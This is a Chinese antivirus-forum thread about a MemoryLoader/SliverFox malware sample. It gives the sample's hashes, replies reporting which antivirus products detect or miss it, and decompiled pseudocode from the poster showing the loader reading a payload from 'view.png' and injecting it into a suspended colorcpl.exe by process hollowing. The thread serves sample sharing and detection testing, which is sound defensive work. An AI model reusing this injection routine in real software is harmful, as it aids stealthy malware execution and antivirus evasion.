查看: 1454|回复: 23
收起左侧

[病毒样本] MemoryLoader/SliverFox 1x

  [复制链接]
DisaPDB
发表于 2024-10-20 12:47:42 | 显示全部楼层 |阅读模式
本帖最后由 DisaPDB 于 2024-10-20 12:48 编辑

HASH
SHA256:7ca1b21a16398384d4f48fca29954677dd92e7a5d67c0e7283ba309eef81341a
MD5:b5681787c720df913d6ca2cefc1bbc38
SHA1:87ea8e94b7b674f3b196ca10b917eae6fd3c62d3

VT(8/73)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 3经验 +15 人气 +3 收起 理由
Hibike + 1
莒县小哥 + 2 版区有你更精彩: )
QVM360 + 15 版区有你更精彩: )

查看全部评分

玛姆库特
发表于 2024-10-20 12:56:17 | 显示全部楼层
(EIS+智量)实机,扫描miss,双击进程自退。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
莒县小哥
发表于 2024-10-20 13:01:01 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
zong701
发表于 2024-10-20 13:03:46 | 显示全部楼层
本帖最后由 zong701 于 2024-10-20 13:18 编辑

奇安信




卡巴


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
netweb
发表于 2024-10-20 13:10:55 | 显示全部楼层
本帖最后由 netweb 于 2024-10-20 13:36 编辑

火绒 kill



智量






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Loyisa
发表于 2024-10-20 13:13:56 | 显示全部楼层
本帖最后由 Loyisa 于 2024-10-20 13:15 编辑

SEP 机学B

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ytysh
发表于 2024-10-20 13:18:33 | 显示全部楼层
Viruschaser 10 AI miss
kaba666
发表于 2024-10-20 13:25:32 | 显示全部楼层
卡巴双击杀衍生物

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
xmt12
发表于 2024-10-20 13:35:05 | 显示全部楼层
自制  kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
 楼主| 发表于 2024-10-20 13:53:18 | 显示全部楼层

复制代码
判断是否存在360 不存在则注入 存在则内存加载
  1. void sub_1800015D0()
  2. {
  3.   void **v0; // rcx
  4.   void *v1; // rbx
  5.   void *v2; // rdi
  6.   void *v3; // rbx
  7.   HANDLE CurrentProcess; // rax
  8.   void *v5; // rcx
  9.   void *v6; // rcx
  10.   size_t Size; // [rsp+50h] [rbp-B0h] BYREF
  11.   struct _PROCESS_INFORMATION ProcessInformation; // [rsp+58h] [rbp-A8h] BYREF
  12.   void *Block[3]; // [rsp+70h] [rbp-90h] BYREF
  13.   unsigned __int64 v10; // [rsp+88h] [rbp-78h]
  14.   void *Src[3]; // [rsp+90h] [rbp-70h] BYREF
  15.   unsigned __int64 v12; // [rsp+A8h] [rbp-58h]
  16.   struct _STARTUPINFOA StartupInfo; // [rsp+B0h] [rbp-50h] BYREF
  17.   struct _CONTEXT Context; // [rsp+120h] [rbp+20h] BYREF

  18.   sub_1800011D0(Src);
  19.   sub_1800027F0(Block, Src, L"\\view.png");
  20.   Size = 0i64;
  21.   v0 = Block;
  22.   if ( v10 >= 8 )
  23.     v0 = (void **)Block[0];
  24.   v1 = sub_180003430((const WCHAR *)v0, &Size);
  25.   v2 = VirtualAlloc(0i64, 0x7A120ui64, 0x3000u, 0x40u);
  26.   memcpy(v2, v1, Size);
  27.   memset(&StartupInfo, 0, sizeof(StartupInfo));
  28.   StartupInfo.cb = 68;
  29.   free(v1);
  30.   StartupInfo.dwFlags = 1;
  31.   StartupInfo.wShowWindow = 0;
  32.   if ( CreateProcessA(0i64, (LPSTR)"colorcpl.exe", 0i64, 0i64, 0, 0x44u, 0i64, 0i64, &StartupInfo, &ProcessInformation) )
  33.   {
  34.     Context.ContextFlags = 65539;
  35.     GetThreadContext(ProcessInformation.hThread, &Context);
  36.     v3 = VirtualAllocEx(ProcessInformation.hProcess, 0i64, 0x7A120ui64, 0x1000u, 0x40u);
  37.     WriteProcessMemory(ProcessInformation.hProcess, v3, v2, 0x7A120ui64, 0i64);
  38.     Context.Rip = (DWORD64)v3;
  39.     SetThreadContext(ProcessInformation.hThread, &Context);
  40.     ResumeThread(ProcessInformation.hThread);
  41.     CloseHandle(ProcessInformation.hThread);
  42.     CloseHandle(ProcessInformation.hProcess);
  43.   }
  44.   CurrentProcess = GetCurrentProcess();
  45.   TerminateProcess(CurrentProcess, 0);
  46.   if ( v10 >= 8 )
  47.   {
  48.     v5 = Block[0];
  49.     if ( 2 * v10 + 2 >= 0x1000 )
  50.     {
  51.       v5 = (void *)*((_QWORD *)Block[0] - 1);
  52.       if ( (unsigned __int64)(Block[0] - v5 - 8) > 0x1F )
  53.         invalid_parameter_noinfo_noreturn();
  54.     }
  55.     j_j_free(v5);
  56.   }
  57.   Block[2] = 0i64;
  58.   v10 = 7i64;
  59.   LOWORD(Block[0]) = 0;
  60.   if ( v12 >= 8 )
  61.   {
  62.     v6 = Src[0];
  63.     if ( 2 * v12 + 2 >= 0x1000 )
  64.     {
  65.       v6 = (void *)*((_QWORD *)Src[0] - 1);
  66.       if ( (unsigned __int64)(Src[0] - v6 - 8) > 0x1F )
  67.         invalid_parameter_noinfo_noreturn();
  68.     }
  69.     j_j_free(v6);
  70.   }
  71. }
复制代码



评分

参与人数 1经验 +10 收起 理由
QVM360 + 10 版区有你更精彩: )

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 17:23 , Processed in 0.142506 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表